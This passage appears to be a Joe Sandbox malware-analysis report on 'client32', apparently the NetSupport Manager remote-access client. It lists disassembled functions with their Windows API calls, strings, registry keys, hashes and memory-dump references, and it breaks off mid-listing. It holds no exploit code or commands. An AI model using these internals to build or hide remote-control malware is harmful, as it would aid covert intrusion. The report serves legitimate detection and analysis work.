                                                                              • Opcode Fuzzy Hash: 47acf8a46b654237af2362819ba01079215634d33959dcd664a85182bc47307d
                                                                              • Instruction Fuzzy Hash: AD519175E01716DFDB85CFA5C984AAAF7F8FB48708B004669E422D7644E730E990CFA0
                                                                              Function 1105A0D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,AB86ACF8,00000000,00000000,74DF23A0,1105A377,00000000,00000000), ref: 1105A128
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 1105A24A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 1105A1DD
                                                                              • RegDeleteValueA.ADVAPI32(?,?), ref: 1105A1FD
                                                                              • RegCloseKey.ADVAPI32(?), ref: 1105A207
                                                                              • SetEvent.KERNEL32(?), ref: 1105A240
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
                                                                              • String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
                                                                              • API String ID: 1302350719-2578778249
                                                                              • Opcode ID: b86f74dc15627503e7c4bd94685024e8bca033cd23369bedd85c5e72bf16c997
                                                                              • Instruction ID: 1f49fd18d6206b038cc207d8770ec6d77d753ef3336a6f753e93b5d574fca70b
                                                                              • Opcode Fuzzy Hash: b86f74dc15627503e7c4bd94685024e8bca033cd23369bedd85c5e72bf16c997
                                                                              • Instruction Fuzzy Hash: 97412975D0072AEFD781CFA4CCC1AAABBA5FB05754F108269E926D7640D736E840CF90
                                                                              Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                              • API String ID: 536389180-1339850372
                                                                              • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                              • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                              Function 110042C0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11001F80: FindWindowA.USER32(Progman,00000000), ref: 11001FA9
                                                                                • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                              • _memset.LIBCMT ref: 11004313
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 110043C6
                                                                              • GetSaveFileNameA.COMDLG32(00000058), ref: 110043CF
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 11004453
                                                                              • RevertToSelf.ADVAPI32 ref: 11004455
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Process$CloseEnableFileFolderHandleNameOpenPath$FindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
                                                                              • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3949878547-2539113696
                                                                              • Opcode ID: ce1c97cf7a7aa21e6251f802e3d21045b55600e3d1615c3dd84d8967101525df
                                                                              • Instruction ID: 1a06fff4f71d161ae854b0cf7e53d0be396d8369705791c075994b803ddd0564
                                                                              • Opcode Fuzzy Hash: ce1c97cf7a7aa21e6251f802e3d21045b55600e3d1615c3dd84d8967101525df
                                                                              • Instruction Fuzzy Hash: E441B3B4E003199BEB21DF60CC41FDAB7F4EB08748F0145A9E519AB280DBB5AA44CF54
                                                                              Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                              • SendMessageA.USER32(00000000,0000004A,00040270,?), ref: 1103D313
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                              • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                              • String ID: CLTCONN.CPP$NSMW16Class
                                                                              • API String ID: 4104200039-3790257117
                                                                              • Opcode ID: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                              • Opcode Fuzzy Hash: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                              Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                              • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                              • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                              • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 490496107-2775872530
                                                                              • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                              • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                              Function 11140380 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 74registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassInfoA.USER32(11000000,NSMStatsWindow,?), ref: 11140399
                                                                              • GetStockObject.GDI32(00000000), ref: 111403D2
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 111403EA
                                                                              • RegisterClassA.USER32(?), ref: 111403FE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GlobalAddAtomA.KERNEL32(NSMStatsWindow), ref: 11140425
                                                                              • CreateWindowExA.USER32(00000088,NSMStatsWindow,Stats,80C80000,00000000,00000000,00000000,00000000,00000000,00000000,11000000,00000000), ref: 1114045F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Class$AtomCreateCursorErrorExitGlobalInfoLastLoadMessageObjectProcessRegisterStockWindowwsprintf
                                                                              • String ID: NSMStatsWindow$Stats$UI.CPP
                                                                              • API String ID: 2264362397-3221558550
                                                                              • Opcode ID: 4eb6c5bb774bbad3e3a68f4fb1ddf214a4a8ecc8339067d6f45288208c44a247
                                                                              • Instruction ID: bebd7d2a7b3372845581ea12ef928e6e0fe2e2f0ea6b207ad6945ed1a953ef7c
                                                                              • Opcode Fuzzy Hash: 4eb6c5bb774bbad3e3a68f4fb1ddf214a4a8ecc8339067d6f45288208c44a247
                                                                              • Instruction Fuzzy Hash: 5B210CB5E0221AAFC744DFE59984BEEFBF8BB08304F10412AE529F2644E7305600CB99
                                                                              Function 11128060 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 41libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,11128B9C,?,?,111291FC,AB86ACF8,?,?,?,00000000,1118BADE,000000FF,?,?), ref: 1112806B
                                                                              • GetProcAddress.KERNEL32(00000000,CancelIo), ref: 1112807B
                                                                              • SetLastError.KERNEL32(0000007F,?,111CD988), ref: 111280A7
                                                                              • SetLastError.KERNEL32(0000007E,?,111CD988), ref: 111280CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressHandleModuleProc
                                                                              • String ID: !"CancelIo NOT FOUND in kernel32.dll!"$!"kernel32.dll NOT FOUND!"$..\nt\vsmartcrd\public\SmartcardDevice.cpp$CancelIo$kernel32.dll
                                                                              • API String ID: 1762409328-2662562804
                                                                              • Opcode ID: acfe7ee854dc3e558664093ce5ef8a73ca71c36a9a436bf1fa4c2d7b7436c370
                                                                              • Instruction ID: cda793e3d14a74608214cb0dea4bb6fde32d3a192c59d564bbd0a57c488a8cc7
                                                                              • Opcode Fuzzy Hash: acfe7ee854dc3e558664093ce5ef8a73ca71c36a9a436bf1fa4c2d7b7436c370
                                                                              • Instruction Fuzzy Hash: 12F0E97578023C77EE2066F67E06FD9FB599B01A9AF400031FA2EE1981E9619400C3D9
                                                                              Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 11035267
                                                                              • _memmove.LIBCMT ref: 1103528B
                                                                              • _memmove.LIBCMT ref: 110352C5
                                                                              • _memmove.LIBCMT ref: 110352E1
                                                                              • std::exception::exception.LIBCMT ref: 1103532B
                                                                              • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                              • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                              Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 110193F7
                                                                              • _memmove.LIBCMT ref: 1101941B
                                                                              • _memmove.LIBCMT ref: 11019455
                                                                              • _memmove.LIBCMT ref: 11019471
                                                                              • std::exception::exception.LIBCMT ref: 110194BB
                                                                              • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                              • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                              Function 1113C3C0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 151windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strncpy.LIBCMT ref: 1113C41F
                                                                              • IsWindow.USER32(00000000), ref: 1113C451
                                                                              • _malloc.LIBCMT ref: 1113C4B0
                                                                              • _memmove.LIBCMT ref: 1113C515
